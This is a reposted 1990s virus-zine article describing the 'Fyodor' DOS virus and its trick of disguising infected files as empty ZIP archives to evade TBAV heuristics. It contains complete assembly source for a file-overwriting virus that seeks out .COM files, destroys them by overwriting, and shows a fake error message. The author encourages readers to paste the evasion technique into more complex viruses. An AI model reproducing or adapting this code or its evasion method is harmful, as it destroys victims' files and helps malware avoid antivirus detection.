SLAM2.024: A Funky New Anti-Heuristic Method - The Fyodor Virus

eZine lover (@eZine)

Published in 

Slam

 · 2 years ago

The Fyodor Virus
by Gothmog/DHA

This virus uses an interesting anti-heuristic technique - infected files masquerade as .ZIP format files. To do this, the virus starts with a dummy 22-byte ZIP file header, which disassembles to do-nothing instructions which fortunately do not crash the processor:

[cs]:0100 50            PUSH    AX 
[cs]:0101 4B            DEC     BX 
[cs]:0102 050600        ADD     AX,0006 
[cs]:0105 0000          ADD     [BX+SI],AL 
[cs]:0107 0000          ADD     [BX+SI],AL 
[cs]:0109 0000          ADD     [BX+SI],AL 
[cs]:010B 0000          ADD     [BX+SI],AL 
[cs]:010D 0000          ADD     [BX+SI],AL 
[cs]:010F 0000          ADD     [BX+SI],AL 
[cs]:0111 0000          ADD     [BX+SI],AL 
[cs]:0113 90            NOP 
[cs]:0114 0000          ADD     [BX+SI],AL

To a ZIP processor, the virus is stored as a ZIP comment, and the actual archive contains no files. In any case, this technique renders the virus invisible to TBAV, which flags only the `p' flag, for a packed file...

While this virus is nothing more than a featureless overwriter (I was testing the idea, so wrote it up _real_ quick...) the technique can easily be added to more complex viruses - just cut and paste!

==========================================================[ code begins ]== 

.model tiny 
.code 

        org     100h 

virusStart: 

        db      50h, 4Bh, 05h, 06h, 00h, 00h, 00h, 00h, 00h, 00h, 00h 
        db      00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 90h, 00h, 00h 

 
findFirst: 

filemask        db      '*.com', 00h, 00h 

        mov     byte ptr virusstart + 1, 'K' 
        mov     ah, 4Eh 

findFile: 
        xor     cx, cx 
        mov     dx, offset filemask 
        int     21h 
        jc      writeMsg 

openFile: 
        mov     ax, 3D00h 
        mov     dx, 9Eh 
        int     21h 
        xchg    bx, ax 

readFile: 
        mov     ah,3fh 
        mov     cx, 2 
        mov     dx, offset buffer 
        int     21h 

closeFile: 
        mov     ah,3eh 
        int     21h 

checkInfected: 
        cmp     word ptr[buffer], 'KP' 
        jnz     OpenFileAgain 
        mov     ah,4fh 
        jmp     findFile 

Virus_Name      db      'fyodor' 

openFileAgain: 
        mov     ax,3d02h 
        mov     dx,9eh 
        int     21h 
        xchg    bx,ax 

infectFile: 
        mov     ah, 40h 
        mov     cx, offset virusEnd - offset virusStart 
        mov     dx, offset virusStart 
        int     21h 

closeFileAgain: 
        mov     ah,3eh 
        int     21h 

writeMsg: 
        mov     dx, offset msgerror 
        mov     ah,09h 
        int     21h 

exit: 
        int     20h 

msgerror        db      'Bad command or file name', 13, 10, '$' 

virusEnd: 

buffer          dw      ? 

        end     virusStart 

; ============================================================[ code ends ]==